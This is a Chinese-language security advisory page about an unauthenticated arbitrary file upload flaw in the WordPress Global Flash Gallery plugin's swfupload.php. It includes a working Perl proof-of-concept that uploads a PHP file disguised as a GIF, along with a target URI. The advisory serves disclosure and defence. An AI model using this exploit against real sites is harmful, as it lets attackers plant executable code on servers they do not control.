首页 -> 安全研究

安全研究

安全漏洞
WordPress Global Flash Gallery 插件'swfupload.php'任意文件上传漏洞

发布日期:2014-01-18
更新日期:2014-01-23

受影响系统:
WordPress Global Flash Gallery
描述:
BUGTRAQ  ID: 65060

WordPress Global Flash Galleries是创建和发布flash图库和幻灯片的插件。

Global-Flash Galleris允许将文件上传到未经身份验证的用户。此漏洞源于/global-flash-galleries/swfupload.php没有进行正确的cookie验证。

<*来源:Ashiyane Digital Security Team
  
  链接:http://packetstormsecurity.com/files/124850/wpglobalflashgalleries-upload.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php

建议:
厂商补丁:

WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://wordpress.org/plugins/global-flash-galleries/
http://downloads.wordpress.org/plugin/global-flash-galleries.zip

浏览次数:3949
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障